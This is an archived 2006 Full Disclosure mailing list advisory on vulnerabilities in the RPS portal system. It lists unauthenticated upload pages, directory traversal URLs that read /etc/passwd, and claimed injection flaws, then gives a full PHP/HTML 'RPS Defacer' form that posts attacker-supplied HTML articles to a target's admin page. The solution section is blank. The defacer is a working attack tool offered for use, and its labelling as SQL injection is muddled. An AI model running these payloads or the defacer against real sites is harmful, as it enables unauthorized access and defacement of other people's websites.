Full Disclosure mailing list archives
Multiple Vulnerabilities RPS
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan () gmail com>
Date: Tue, 18 Jul 2006 21:00:57 -0500
########################################################################### # Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system) # # # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: zeus () diosdelared com # Website: www.elitemexico.org # Date: 18/07/06 # Risk: medium # Vendor Url: http://rps.rigtersir.com/ # Affected Software: RPS # Non Affected: RPS V 4 # #Info: ################################################################## #UPLOAD FILES # it allows the user to raise archives without having administration privileges # # #SQL inyección #it allows the user to insert post without having to be admin with this can make xss or #HTML injection # # #example of upload files ################################################################## # #http://www.vuln.com/[path]/adm/photos/images.php # #http://www.vuln.com/[path]//adm/down/files.php # ################################################################## #example Remote Execution ################################################################## # #http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd # #http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index # ################################################################## # #Solution: ################################################################## # # #VULNERABLE VERSIONS ################################################################## # v1.0, 2.0 3.0 # ################################################################## #Contact information #0o_zeus_o0 #zeus () diosdelared com #www.elitemexico.org ################################################################## #greetz: lady fire,Mi beba, olimpus klan team and elitemexico # #Original Advisory: http://zeus.pccentervillaflores.com//13.txt ################################################################## SQL inyección in "Articulos" exploit <?php /* RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~• Date: 08/01/06 Website: www.elitemexico.org */ ?> <html> <head> <title>RPS Defacer</title> </head> <body text="#FFFFFF" bgcolor="#000000"> <p align="center"><font face="Verdana" size="2"><b><u><font color="#FF0000">RPS Defacer<br> <br> </font> </u><font color="#FF0000">0o_ZEUS_o0 OliMpusKlaN <br /> •~ FX ~•</font></b></font></p> <form method="POST" ACTION="?action=enviar" name="rps_defacer"> <center> <table border="0" cellpadding="5" cellspacing="0" style="border-collapse: collapse" width="40%"> <tr> <td width="100%"><b><font face="Verdana" size="1">Direccion:<br> <input type="text" name="url" size="30" value="http://";></font></b></td> </tr> <tr> <td width="100%"><b><font size="1" face="Verdana">Autor:<br> <input type="text" name="autor" size="20"></font></b></td> </tr> <tr> <td width="100%"><b><font face="Verdana"><font size="1">Email:<br> <input type="text" name="email" size="20"></font></font></b></td> </tr> <tr> <td width="100%"><b><font size="1" face="Verdana">Titulo:<br> <input type="text" name="titulo" size="30"></font></b></td> </tr> <tr> <td width="100%"><b><font size="1" face="Verdana">Contenido: (Soporta HTML Inyection)<br> <textarea rows="13" name="articulo" cols="55"></textarea></font></b></td> </tr> <tr> <td width="100%"> <p align="center"><b><font face="Verdana" size="1"> <input type="submit" value="Enviar" name="send"> <input type="reset" value="Restablecer" name="delete"></font></b></td> </tr> </table> </center> </div> </form> <? if($action=="enviar"){ $web= $_POST['url']; echo "<script LANGUAGE=\"JavaScript\"> var pagina=\"$web/adm/add_art.php\" function redireccionar() { location.href=pagina } setTimeout (\"redireccionar()\", 0001); </script>"; } ?> </body> </html>
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Multiple Vulnerabilities RPS 0o_zeus_o0 elitemexico.org (Jul 18)